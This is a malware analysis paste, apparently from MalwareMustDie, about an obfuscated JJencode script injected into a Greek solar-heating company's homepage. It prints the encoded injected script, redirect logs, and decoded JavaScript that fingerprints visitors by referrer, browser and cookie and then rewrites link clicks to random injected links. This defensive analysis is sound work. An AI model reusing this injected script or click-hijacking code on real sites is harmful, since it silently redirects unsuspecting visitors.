Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ===============================================
- The suspected JS/Agent/Downloader Trojan
- #MalwareMustDie | @unixfreaxjp | Sat Oct 27 02:06:28 JST 2012
- Update: Sat Oct 27 14:19:55 JST 2012 (Decoded JJencode)
- ===============================================
- // checking a hint...
- $ myfetch h00p://www.iliosak.gr/index.php
- --proxy=1
- --user-agent="Mozila/4.3(X11; U; MacOSX)"
- --referer="h00p://www.google.com/search?q=gmail"
- --target="h00p://www.iliosak.gr/index.php"
- --01:17:44-- h00p://www.iliosak.gr/index.php
- => `index.php'
- Connecting to 192.168.7.11:8118... connected.
- Proxy request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- 01:17:48 (19.24 KB/s) - `index.php' saved [51627]
- // peek inside...
- $ head index.php
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h00p://www.w3.or
- g/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="h00p://www.w3.org/1999/xhtml" xml:lang="el-gr" lang="el-gr"
- dir="ltr" >
- <head>
- <SCRIPT type="text/javascript"> <!--
- $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$
- :({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$
- :++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=
- $+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$.
- _$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])
- +$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_ :
- // ↑ nice! :-)
- // 1. he tried to hide the script tag...
- // 2. JJencode which too obviously too suspicious to ignore..
- // 3. what is the purpose behind this?
- // A greek language site...ok.
- <meta name="keywords" content="Ηλιακοί
- θερμοσίφωνες,ηλιακός θερμοσίφωνας,Ηλιακά συστήματα,ηλιακοί,φωτοβολταϊκά,κλιματισμός,θέρμανση,Μεσσηνία" />
- <meta name="description" content="Εργοστάσιο κατασκευής ηλιακών συστημάτων και εφαρμογών φωτοβολταϊκών θέρμανσης & κλιματισμού στη Μεσσηνία από το 1977.
- //Obfuscation Javascript is under analysis....
- // OTHERS are....
- //requestsing
- h00p://www.iliosak.gr/templates/yoo_switch/lib/js/mootools.js.php .......CLEAN
- h00p://www.iliosak.gr/media/system/js/caption.js .......CLEAN
- h00p://www.iliosak.gr/templates/yoo_switch/lib/js/template.js.php .......CLEAN
- h00p://www.iliosak.gr/modules/mod_virtuemart/vm_transmenu/transmenu.js .......CLEAN
- // redirecting..
- h00p://crotopole.eu/a41bb3d1c7 ⇒ h00p://www.cam4cam.fr/
- --01:40:46-- h00p://crotopole.eu/a41bb3d1c7
- => `a41bb3d1c7'
- Resolving crotopole.eu... 88.191.151.166
- Connecting to crotopole.eu|88.191.151.166|:80... connected.
- h00p request sent, awaiting response... 301 Moved Permanently
- Location: h00p://www.cam4cam.fr/ [following]
- --01:40:46-- h00p://www.cam4cam.fr/
- => `index.html'
- Resolving www.cam4cam.fr... 88.191.151.166
- Reusing existing connection to crotopole.eu:80.
- h00p request sent, awaiting response... 200 OK
- Length: 5,961 (5.8K) [text/html]
- // a wordpress↓ ............CLEAN one.....
- #Penguinzophren, Sentimancho | Cam4 cam | Chatroulette & Chat webcam
- #Penguinzophren Vs Sentimancho RSS Feed
- Penguinzophren Vs Sentimancho
- * Penguinzophren Vs Sentimancho
- *
- * Non classé
- Matt Cutts Vs Black Hat
- Sentimancho Vs Penguinzophren
- Non classé | riko | Comments (0) |
- Le but du concours est de : Niker MC et GG (pour les intimes) Tu l'auras compris mon titre veut tout dire, Matt cutts
- je veux ta peau! Celle du Penguinzophren ainsi que celle du Sentimancho . Matt Cutts le pingouin en slip Penguinzophren
- et Sentimancho pour moi et tous les referenceurs qui participent de près où de lien à cette grande cage aux folles
- // and a download....
- h00p://www.cres.gr/energy-saving/SCRIPT_2.htm...... clean!...
- // It is up to the javascript decoding result...
- // Handover to the two genious in our crackteam Thanks guys!
- //The JJEncode turns up to be ↓ which checks your referer, set/checks the Cookie, checks the browser version for access (significant check for Chrome..), is a short of ACL for visitor accessing the page..
- ((function $anonymous$(){return" page_links = [];
- function setGlobalOnLoad(f) {
- var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null
- if (root){
- if(root.addEventListener) root.addEventListener(\"load\", f, false)
- else if(root.attachEvent) root.attachEvent(\"onload\", f)
- } else {
- if(typeof window.onload == 'function') {
- var existing = window.onload
- window.onload = function() {
- existing()
- f()
- }
- } else {
- window.onload = f
- }
- }
- }
- function addHandler(object, event, handler) {
- if (typeof object.addEventListener != 'undefined')
- object.addEventListener(event, handler, false);
- else if (typeof object.attachEvent != 'undefined')
- object.attachEvent('on' + event, handler);
- }
- if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer!='' || document.referrer.indexOf (document.domain)==-1) {
- var right_browser='yes';
- }else var right_browser='no';
- function getCookie(c_name)
- {
- if (document.cookie.lengthj)
- {
- c_start=document.cookie.indexOf(c_name + \"=\");
- if (c_start!=-1)
- {
- c_start=c_start + c_name.length+1;
- c_end=document.cookie.indexOf(\";\",c_start);
- if (c_end==-1) c_end=document.cookie.length;
- return unescape(document.cookie.substring(c_start,c_end));
- }
- }
- return \"\";
- }
- var c_index = Math.floor(Math.random() * 5);
- var fcoo=getCookie('c_first');
- var exdate=new Date();
- exdate.setDate(exdate.getDate()+365);
- document.cookie='c_first'+ \"=\" +escape('false')+\";expires=\"+exdate.toUTCString();
- if (c_index=O && fcoo!='false' && right_browser=='yes') {
- setGlobalOnLoad(function() {
- var block = document.getElementById('mlk');
- var links = block.getElementsByTagName('A');
- for (var i = 0; i < links.length; i++) {
- page_links.push(links[i].href);
- }
- var links = document.links;
- for (var i = 0; i < links.length; i++) {
- addHandler(links[i], \"click\", function(event) {
- var index = Math.floor(Math.random() * (page_links.length - 1));
- event.target.href = page_links[index];
- });
- }
- });
- #MalwareMustDie!
Add Comment
Please, Sign In to add comment